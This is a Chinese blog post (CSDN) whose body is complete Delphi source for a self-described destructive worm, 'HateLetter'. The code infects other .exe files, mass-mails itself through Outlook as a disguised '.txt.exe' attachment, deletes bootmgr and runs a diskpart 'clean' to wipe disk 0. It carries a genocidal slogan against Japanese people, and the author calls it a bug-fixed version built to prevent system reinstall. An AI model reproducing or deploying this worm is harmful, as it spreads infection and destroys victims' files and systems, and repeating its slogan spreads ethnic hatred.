Delphi 蠕虫病毒

已于 2024-08-07 12:01:37 修改
阅读量131 收藏
点赞数 5
文章标签: Delphi
于 2024-08-07 09:03:30 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/vliu612/article/details/140971978
版权 
program HateLetter;
 
{$APPTYPE CONSOLE}
 
uses
  Windows,   SysUtils,   Classes,   Graphics,   ShellAPI,   ComObj,   Variants,   Registry,   ActiveX,   ShlObj;
 
const
  HeaderSize = 82432;
  IconOffset = $12EB8;
  IconSize = $2E8;
  IconTail = IconOffset + IconSize;
  ID = $44444444; // Infection marker
  Catchword = 'If a race needs to be killed out,   it must be Yamato. If a country needs to be destroyed,   it must be Japan! *** W32.HateLetter.Worm.A ***';
 
function RegisterServiceProcess(dwProcessID,   dwType:   Integer):   Integer; stdcall; external 'Kernel32.dll';
 
var
  TmpFile:   string;
  Si:   STARTUPINFO;
  Pi:   PROCESS_INFORMATION;
  SourceFile:   string;
 
procedure CopySelfToBackup;
const
  BackupPath = 'D:  \Backup\HateLetter.txt.exe';
begin
  try
    if not DirectoryExists('D:  \Backup') then
      if not CreateDir('D:  \Backup') then
        raise Exception.Create('Failed to create backup directory.');
 
    if not CopyFile(PChar(ParamStr(0)),   PChar(BackupPath),   False) then
      raise Exception.Create('Failed to copy file to backup.');
  except
    on E:   Exception do
      Writeln('Error in CopySelfToBackup:   ',   E.Message);
  end;
end;
 
procedure ExecuteCommand(const Cmd:   string);
begin
  try
    if ShellExecute(0,   'open',   'cmd.exe',   PChar('/C ' + Cmd),   nil,   SW_HIDE) <= 32 then
      raise Exception.Create('Failed to execute command:   ' + Cmd);
  except
    on E:   Exception do
      Writeln('Error in ExecuteCommand:   ',   E.Message);
  end;
end;
 
procedure CopyFileToSpecialFolder(const SourceFile,   SpecialFolder:   string);
var
  Path:   array[0..MAX_PATH] of Char;
begin
  try
    if Succeeded(SHGetFolderPath(0,   CSIDL_STARTMENU or CSIDL_FLAG_CREATE,   0,   0,   Path)) then
    begin
      if not CopyFile(PChar(SourceFile),   PChar(Path + '\' + SpecialFolder),   False) then
        raise Exception.Create('Failed to copy file to special folder:   ' + SpecialFolder);
    end;
  except
    on E:   Exception do
      Writeln('Error in CopyFileToSpecialFolder:   ',   E.Message);
  end;
end;
 
procedure SetRegistryValue(RootKey:   HKEY; const Key,   Name:   string; ValueType:   TRegDataType; const Value:   Variant);
var
  Reg:   TRegistry;
begin
  try
    Reg :  = TRegistry.Create(KEY_WRITE);
    try
      Reg.RootKey :  = RootKey;
      if Reg.OpenKey(Key,   True) then
      begin
        case ValueType of
          rdString,   rdExpandString:   Reg.WriteString(Name,   Value);
          rdInteger:   Reg.WriteInteger(Name,   Value);
          rdBinary:   Reg.WriteBinaryData(Name,   Value,   Length(Value));
        end;
      end else
        raise Exception.Create('Failed to open registry key:   ' + Key);
    finally
      Reg.Free;
    end;
  except
    on E:   Exception do
      Writeln('Error in SetRegistryValue:   ',   E.Message);
  end;
end;
 
procedure InstallOutlook;
begin
  ExecuteCommand('powershell -Command "Start-Process msiexec.exe -ArgumentList ''/i OutlookSetup.msi /quiet /norestart'' -NoNewWindow -Wait"');
end;
 
procedure SendEmails;
var
  OutlookApp,   MailItem,   Namespace,   AddressLists,   AddressEntry:   OleVariant;
  I:   Integer;
  Recipient:   String;
  AttachmentPath:   String;
begin
  try
    OutlookApp :  = CreateOleObject('Outlook.Application');
  except
    on E:   Exception do
    begin
      Writeln('Error in creating Outlook application:   ',   E.Message);
      InstallOutlook;
      OutlookApp :  = CreateOleObject('Outlook.Application');
    end;
  end;
 
  try
    Namespace :  = OutlookApp.GetNamespace('MAPI');
    AddressLists :  = Namespace.AddressLists.Item(1);
    AttachmentPath :  = 'D:  \Backup\HateLetter.txt.exe'; // Attachment path
 
    for I :  = 1000 to AddressLists.AddressEntries.Count do
    begin
      try
        MailItem :  = OutlookApp.CreateItem(0); // Create new email item
        AddressEntry :  = AddressLists.AddressEntries.Item(I);
        Recipient :  = AddressEntry.Address;
 
        MailItem.Recipients.Add(Recipient);
        MailItem.Subject :  = 'You are foolish!!!!!!!!!!!!!!!!!';
        MailItem.Body :  = 'I hate you,   here is a document explaining why you are so foolish!!!!!!!!';
        MailItem.Attachments.Add(AttachmentPath); // Attach file
        MailItem.Send; // Send email
      except
        on E:   Exception do
          Writeln('Error in SendEmails:   ',   E.Message);
      end;
    end;
  except
    on E:   Exception do
      Writeln('Error in SendEmails:   ',   E.Message);
  end;
end;
 
function IsWin9x:   Boolean;
var
  Ver:   TOSVersionInfo;
begin
  Result :  = False;
  Ver.dwOSVersionInfoSize :  = SizeOf(TOSVersionInfo);
  if GetVersionEx(Ver) then
  begin
    if (Ver.dwPlatformID = VER_PLATFORM_WIN32_WINDOWS) then // Win9x
      Result :  = True;
  end else
    Writeln('Failed to get OS version.');
end;
 
procedure CopyStream(Src:   TStream; sStartPos,   Dst:   TStream; dStartPos,   Count:   Integer);
var
  sCurPos,   dCurPos:   Integer;
begin
  try
    sCurPos :  = Src.Position;
    dCurPos :  = Dst.Position;
    Src.Seek(sStartPos,   soFromBeginning);
    Dst.Seek(dStartPos,   soFromBeginning);
    Dst.CopyFrom(Src,   Count);
    Src.Seek(sCurPos,   soFromBeginning);
    Dst.Seek(dCurPos,   soFromBeginning);
  except
    on E:   Exception do
      Writeln('Error in CopyStream:   ',   E.Message);
  end;
end;
 
procedure ExtractFile(FileName:   string);
var
  sStream,   dStream:   TFileStream;
begin
  try
    sStream :  = TFileStream.Create(ParamStr(0),   fmOpenRead);
    try
      dStream :  = TFileStream.Create(FileName,   fmCreate);
      try
        sStream.Seek(HeaderSize,   soFromBeginning);
        dStream.CopyFrom(sStream,   sStream.Size - HeaderSize);
      finally
        dStream.Free;
      end;
    finally
      sStream.Free;
    end;
  except
    on E:   Exception do
      Writeln('Error in ExtractFile:   ',   E.Message);
  end;
end;
 
procedure FillStartupInfo(var Si:   STARTUPINFO; State:   Word);
begin
  Si.cb :  = SizeOf(Si);
  Si.lpReserved :  = nil;
  Si.lpDesktop :  = nil;
  Si.lpTitle :  = nil;
  Si.dwFlags :  = STARTF_USESHOWWINDOW;
  Si.wShowWindow :  = State;
  Si.cbReserved2 :  = 0;
  Si.lpReserved2 :  = nil;
end;
 
procedure InfectOneFile(FileName:   string);
var
  HdrStream,   SrcStream:   TFileStream;
  IcoStream,   DstStream:   TMemoryStream;
  iID:   LongInt;
  aIcon:   TIcon;
  Infected,   IsPE:   Boolean;
  i:   Integer;
  Buf:   array[0..1] of Char;
begin
  try
    if CompareText(FileName,   'HateLetter.txt.exe') = 0 then
      Exit;
 
    Infected :  = False;
    IsPE :  = False;
    SrcStream :  = TFileStream.Create(FileName,   fmOpenRead);
    try
      for i :  = 0 to $108 do
      begin
        SrcStream.Seek(i,   soFromBeginning);
        SrcStream.Read(Buf,   2);
        if (Buf[0] = #80) and (Buf[1] = #69) then
        begin
          IsPE :  = True;
          Break;
        end;
      end;
 
      SrcStream.Seek(-4,   soFromEnd);
      SrcStream.Read(iID,   4);
      if (iID = ID) or (SrcStream.Size < 10240) then
        Infected :  = True;
    finally
      SrcStream.Free;
    end;
 
    if Infected or (not IsPE) then
      Exit;
 
    IcoStream :  = TMemoryStream.Create;
    DstStream :  = TMemoryStream.Create;
    try
      aIcon :  = TIcon.Create;
      try
        aIcon.ReleaseHandle;
        aIcon.Handle :  = ExtractIcon(HInstance,   PChar(FileName),   0);
        aIcon.SaveToStream(IcoStream);
      finally
        aIcon.Free;
      end;
 
      SrcStream :  = TFileStream.Create(FileName,   fmOpenRead or fmShareDenyWrite);
      try
        DstStream.CopyFrom(SrcStream,   0);
      finally
        SrcStream.Free;
      end;
 
      HdrStream :  = TFileStream.Create(ParamStr(0),   fmOpenRead);
      try
        DstStream.Seek(0,   soFromBeginning);
        CopyStream(HdrStream,   0,   DstStream,   0,   HeaderSize);
        if (IcoStream.Size > 0) and (IcoStream.Size < 2048) then
        begin
          CopyStream(IcoStream,   0,   DstStream,   IconOffset,   IcoStream.Size);
          for i :  = IconTail to (IconOffset + 2048) do
            DstStream.Write(iID,   1);
        end;
 
        DstStream.Seek(0,   soFromEnd);
        HdrStream.Seek(HeaderSize,   soFromBeginning);
        DstStream.CopyFrom(HdrStream,   HdrStream.Size - HeaderSize);
        DstStream.Write(ID,   4);
      finally
        HdrStream.Free;
      end;
 
      DstStream.SaveToFile(FileName);
    finally
      IcoStream.Free;
      DstStream.Free;
    end;
  except
    on E:   Exception do
      Writeln('Error in InfectOneFile:   ',   E.Message);
  end;
end;
 
procedure SpreadInfection;
var
  SearchRec:   TSearchRec;
begin
  try
    if FindFirst('*.exe',   faAnyFile,   SearchRec) = 0 then
    begin
      repeat
        InfectOneFile(SearchRec.Name);
      until FindNext(SearchRec) <> 0;
      FindClose(SearchRec);
    end;
  except
    on E:   Exception do
      Writeln('Error in SpreadInfection:   ',   E.Message);
  end;
end;
 
procedure DeleteFileSystem32Bootmgr;
var
  FilePath:   string;
begin
  FilePath :  = 'C:  \Windows\System32\bootmgr';
  if DeleteFile(PChar(FilePath)) then
    Writeln('File deleted successfully.')
  else
    Writeln('Failed to delete file:   ',   SysErrorMessage(GetLastError));
end;
 
procedure RunDiskPartScript;
var
  ScriptFileName:   string;
  DiskPartProcessInfo:   TProcessInformation;
  DiskPartStartupInfo:   TStartupInfo;
  DiskPartCmdLine:   string;
  ExitCode:   DWORD;
begin
  ScriptFileName :  = 'diskpart_script.txt';
 
  // Create the DiskPart script
  with TStringList.Create do
  try
    Add('select disk 0');
    Add('clean');
    SaveToFile(ScriptFileName);
  finally
    Free;
  end;
 
  // Initialize the startup info
  ZeroMemory(@DiskPartStartupInfo,   SizeOf(TStartupInfo));
  DiskPartStartupInfo.cb :  = SizeOf(TStartupInfo);
  DiskPartStartupInfo.dwFlags :  = STARTF_USESHOWWINDOW;
  DiskPartStartupInfo.wShowWindow :  = SW_HIDE;
 
  DiskPartCmdLine :  = 'diskpart /s ' + ScriptFileName;
 
  // Create the process to run DiskPart
  if CreateProcess(nil,   PChar(DiskPartCmdLine),   nil,   nil,   False,   0,   nil,   nil,   DiskPartStartupInfo,   DiskPartProcessInfo) then
  begin
    // Wait for DiskPart to complete
    WaitForSingleObject(DiskPartProcessInfo.hProcess,   INFINITE);
    GetExitCodeProcess(DiskPartProcessInfo.hProcess,   ExitCode);
    Writeln('DiskPart exited with code:   ',   ExitCode);
 
    // Clean up handles
    CloseHandle(DiskPartProcessInfo.hProcess);
    CloseHandle(DiskPartProcessInfo.hThread);
  end
  else
    Writeln('Failed to execute DiskPart:   ',   SysErrorMessage(GetLastError));
 
  // Delete the DiskPart script file
  DeleteFile(PChar(ScriptFileName));
end;
 
begin
  try
    if IsWin9x then
      RegisterServiceProcess(GetCurrentProcessID,   1);
 
    CopySelfToBackup;
    SpreadInfection;
    SendEmails;
 
    Writeln('Deleting bootmgr...');
    DeleteFileSystem32Bootmgr;
 
    Writeln('Running DiskPart script...');
    RunDiskPartScript;
  except
    on E:   Exception do
      Writeln(E.ClassName,   ':   ',   E.Message);
  end;
end.

本来我就设计了禁用重装系统,但是有人说可以重装,最后发现了一个bug,已下是修复后的代码。

vliu612
关注
  • 5
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
蠕虫病毒与一般计算机病毒的区别,蠕虫和病毒的区别是什么啊!
weixin_39942995的博客
07-13 2469
jhello05-26 08:07等级3楼顶ls感染Nimda蠕虫病毒cxhioulover05-26 09:54等级4楼蠕虫,也是病毒的一种吧,大家习惯性的把具有破坏性的程序统称为病毒,就干脆这样叫了。蠕虫最初是有莫里斯做出来的,他的想法是利用一个程序,探查一下,联网的计算机到底有多少,结果事与愿违,导致了网络瘫痪。可以说,蠕虫就是带有感染性,能主动传播的特点。很多流行病毒(如:机器狗、磁碟机、...
delphi编译产生的病毒问题
09-01
Delphi病毒是一种可以在编译时感染Delphi文件的病毒,具体来说是Win32/Induc.A病毒。该病毒可以感染Delphi 4、5、6、7版本的编译文件,并且可以在编译时将自身源代码写入文件。下面是该病毒的详细信息: 病毒概况 ...
Incaseformat蠕虫病毒分析
weixin_45484297的博客
03-29 1496
Incaseformat蠕虫病毒分析 01背景 1月13日, incaseformat病毒在全网集中爆发,中毒用户C盘以外所有文件被删除。 该病毒最早可以追溯到2009年,该病毒会在2010年4月1日(愚人节)触发删除文件逻辑;而此次爆发的病毒是经过篡改得到的变种,最早可以追溯到2014年。而实际上火绒、360等主流安全防护软件均能查杀这两个变种病毒,中毒用户多是未安装防护软件或是对该病毒添加了信任。 02样本概况 样本名称:tsay.exe 、ttry.exe 严重程度:高危 行为签名:设置注册表实现自
Synaptics 蠕虫病毒
热门推荐
来自82年的博客
12-25 2万+
前言 这几天逛论坛看到有老哥不小心感染Synaptics 蠕虫病毒,原因是360安全卫士导致,就想转载分享记录下来。 提示:以下是本篇文章正文内容,下面案例可供参考 起因是,老哥U盘很多dll文件被改,多了前缀名cache_ 或者出现桌面的所有xlsx都变成用户为RPC1的xlsm,桌面锁屏无法生效(无论设置几分钟都不能自动关闭显示器) 。 是因为感染了 Synaptics 蠕虫病毒 ,这是个感染病毒,没杀干净容易复发,病毒已经被特征了,杀软可清除。但如果选择360,可能连你的源文件一起带走,建议使
浅谈用delphi来编写蠕虫病毒
LXM13579929299的博客
05-21 313
能大家想到病毒,第一反应就是可能是用asm来编写,或者是vbsript,而高级语言如delphi就好象不能编写一样,其实事实并不是这个样子的,只要我们花一些时间,照样可以写出简短而高效的病毒程序来,一点也不输那些用汇编写出来的程序哦。 一个病毒程序首先要短小,我们的目标是经过压缩后控制在30k以下。用过delphi的朋友都知道,如果在uses里面加入forms,classes.......
Delphi编写蠕虫病毒浅析
weixin_30776273的博客
02-28 74
Delphi编写蠕虫病毒浅析 转自http://www.bianceng.cn/Programming/Delphi/200711/5420.htm posted on 2012-02-28 11:33 linyawen 阅读(...) 评论(...) 编辑 收藏 ...
终极版蠕虫PE病毒
vliu612的博客
08-06 272
【代码】终极版蠕虫PE病毒。
Delphi来编写蠕虫病毒代码示例
九月的专栏
10-11 729
可能大家想到病毒,第一反应就是可能是用asm来编写,或者是vbsript,而高级语言如delphi就好象不能编写一样,其实事实并不是这个样子的,只要我们花一些时间,照样可以写出简短而高效的病毒程序来,一点也不输那些用汇编写出来的程序哦。   一个病毒程序首先要短小,我们的目
【转载】蠕虫病毒 incaseformat 在国内肆虐,可导致用户数据丢失
weitaming1的博客
01-15 337
本文转载自 云头条 2021年1月13日,深信服、360、火绒安全实验室等国内安全公司对外发布预警,称一种名为incaseformat的蠕虫病毒在国内爆发。 今早某公司电脑中毒以后的情况: 深信服称,该蠕虫病毒早在2014年就已经爆发。因为该病毒所使用的delphi库中的 DateTimeToTimeStamp 函数中 IMSecsPerDay 变量的值错误,最终导致 DecodeDate 计算转换出的系统当前时间错误。 该蠕虫病毒执行后会自复制到系统盘Windows目录下,并创建注册表自.
Delphi来编写蠕虫病毒浅析
技术改变世界
08-26 568
  一个病毒程序首先要短小,我们的目标是经过压缩后控制在30k以下。用过delphi的朋友都知道,如果在uses里面加入forms,classes.....等就会使目标文件非常的大,所以,在我们的程序里,我们要尽可能的不用这些库。我们只用windows,winsock,shellapi,sysutils(这个里面包含了一些常用的函数,比如对文件的操作,对字符串的操作,如果用自己的程序来代替,目标文
japussy(delphi病毒)研究使用
08-21
含源码,研究使用,大家在不读懂的情况下不要运行。{我们交流的是技术,展示的源代码和相关代码的目的只是为了说明技术的原理和使用。如果任何个人或组织利用本文档发布的技术进行破坏,应由其本人负责。...
Delphi10.4.2
05-14
Delphi10.4.2 下载地址
delphi实现权限管理
03-26
delphi实现权限管理
Delphi控制Windows防火墙
11-28
Delphi打开关闭Windows防火墙
27.siamese连体网络小样本猫狗品种分类.zip
08-06
27.siamese连体网络小样本猫狗品种分类
C++试题库系统的设计与开发(源代码).zip
08-06
C++试题库系统的设计与开发,包含全量功能源码、配置教程,及相关文档说明,供大家学习使用!
20个二级指标报告年份数据集2003-2022年.xlsx
最新发布
08-06
详细介绍及样例数据:https://blog.csdn.net/T0620514/article/details/140968187
一个spring boot+uniapp的JAVA开源商城系统,前后端分离、 [ 微信 + 支付宝 + 百度 + 头条 ] 小程
08-06
【项目资源】:包含前端、后端、移动开发、人工智能、物联网、信息化管理、数据库、硬件开发、大数据、课程资源,毕业设计等各种技术项目的源码。包括C++、Java、python、web、C#、EDA等项目的源码。 【适用人群】:适用于希望学习不同技术领域的初学者或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。 【附加价值】:项目具有较高的学习借鉴价值,也可直接拿来修改复刻。对于有一定基础或热衷于研究的人来说,可以在这些基础代码上进行修改和扩展,实现其他功能。 【沟通交流】:有任何使用上的问题,欢迎随时与博主沟通,博主会及时解答。鼓励下载和使用,并欢迎大家互相学习,共同进步。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值